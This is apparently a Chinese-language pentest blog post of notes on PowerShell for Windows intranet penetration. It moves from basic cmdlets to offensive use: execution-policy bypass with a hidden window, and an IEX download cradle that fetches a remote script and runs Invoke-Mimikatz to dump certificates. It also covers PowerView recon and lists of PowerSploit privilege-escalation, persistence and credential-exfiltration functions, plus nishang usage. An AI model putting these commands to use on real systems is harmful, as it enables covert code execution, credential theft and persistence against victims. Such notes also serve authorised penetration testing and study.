### powershell
powershell命令叫做cmdlet
具有一致的命名规范，都采用动词-名词的形式，如New-Item
动词部分一般为Add, New, Get, Remove, Set等
命令的别名一般兼容Windows Command以及LinuxShell，如Get-ChildItem命令可以使用dir或者ls都可以。
Powershell命令不区分大小写
**文件操作的基本用法**
新建目录
New-Item whittt -ItemType Directory
新建文件
New-Item www -ItemType File
删除目录
Remove-Item whittt
显示文本
Get-Content light.txt
设置文本内容
Set-Content light.txt -Value "dddd"
追加内容
Add-Content light.txt -Value "dddd"
清除内容
Clear-Content light.txt

### powershell 脚本
了解计算机上的现用执行策略，键入:get-executionpolicy
Restricted---默认的配置，不允许任何script执行
Allsigned---只能允许经过数字证书签名的script
RemoteSign---运行本地的script不需要签名
Unrestricted---允许所有的script运行。
如果要在本地计算机上运行自己的脚本，请使用以下命令将计算机上的执行策略更改为RemoteSigned

Set-ExecutionPolicy unrestricted
### powershell工具
powerersploit, nishang, powershellsuite等等

本地权限绕过执行
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
本地隐藏权限绕过执行脚本
PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive
-NoProfile -WindowStyle Hidden（隐藏窗口） -File xxx.ps1

直接使用IEX下载远程的PS1脚本文件
powershell "IEX(New-Object Net.WebClient).DownloadString('http://1.1.1.1/111');Invoke-Mimikatz -DumpCerts"

#### powersploit
##### Recon模块
用来进行域渗透中的内网信息收集的，Recon文件夹中主要的工具是powerview.
用法：
> powershell -ep bypass Import-Module .\PowerView.ps1;Get-NetSession

![](/download/b2ca030f-a3c4-43e2-aa0b-4737513742c6.png)

> powershell -ep bypass IEX(New-Object New.WebClient).DownloadString('http://127.0.0.1:12345/PowerView.ps1');Get-NetUser

![](/download/a9b528a9-ecfb-4c6a-bb3d-0e401b3e9772.png)

##### Privesc 模块
```
Service Enumeration:

Get-ServiceUnquoted             -   returns services with unquoted paths that also have a space in the name
    Get-ServiceFilePermission       -   returns services where the current user can write to the service binary path or its config
    Get-ServicePermission           -   returns services the current user can modify
    Get-ServiceDetail               -   returns detailed information about a specified service

Service Abuse:

Invoke-ServiceAbuse             -   modifies a vulnerable service to create a local admin or execute a custom command
    Write-ServiceBinary             -   writes out a patched C# service binary that adds a local admin or executes a custom command
    Install-ServiceBinary           -   replaces a service binary with one that adds a local admin or executes a custom command
    Restore-ServiceBinary           -   restores a replaced service binary with the original executable

DLL Hijacking:

Find-DLLHijack                  -   finds .dll hijacking opportunities for currently running processes
    Find-PathHijack                 -   finds service %PATH% .dll hijacking opportunities
    Write-HijackDll                 -   writes out a hijackable .dll

Registry Checks:

Get-RegAlwaysInstallElevated    -   checks if the AlwaysInstallElevated registry key is set
    Get-RegAutoLogon                -   checks for Autologon credentials in the registry
    Get-VulnAutoRun                 -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns

Misc.:

Get-VulnSchTask                 -   find schtasks with modifiable target files
    Get-UnattendedInstallFile       -   finds remaining unattended installation files
    Get-Webconfig                   -   checks for any encrypted web.config strings
    Get-ApplicationHost             -   checks for encrypted application pool and virtual directory passwords
    Write-UserAddMSI                -   write out a MSI installer that prompts for a user to be added
    Invoke-AllChecks                -   runs all current escalation checks and returns a report
```
##### Persistence模块
```
E:\Tools\Windows\PowerSploit-3.0.0\Persistence>powershell -ep bypass Import-Module .\Persistence.psd1;Get-Command -Module Persistence

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Function        Add-Persistence                                    3.0.0.0    Persistence
Function        Get-SecurityPackages                               3.0.0.0    Persistence
Function        Install-SSP                                        3.0.0.0    Persistence
Function        New-ElevatedPersistenceOption                      3.0.0.0    Persistence
Function        New-UserPersistenceOption                          3.0.0.0    Persistence
```

##### Exfiltration模块
提取凭证等信息
```
Get-GPPassword
Get-Keystrokes
Get-TimedScreenshot
Get-VaultCredential
Invoke-CrendentailInjection
Invoke-Mimikatz
Invoke-NinjaCopy
Invoke-TokenManipulation
Out-Minidump
VolumeShadowCopyTools
```

#### nishang
```
Import all the scripts in the current PowerShell session (PowerShell v3 onwards).

PS C:\nishang> Import-Module .\nishang.psm1

Use the individual scripts with dot sourcing.

PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

To get help about any script or function, use:

PS C:\nishang> Get-Help [scriptname] -full

Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.

For example, to see the help about Get-WLAN-Keys.ps1, use

PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

```
#### powershell-suite

XELDAX BLOG

Pentest

Vul

Files Share

Windows 内网渗透下PowerShell系列工具笔记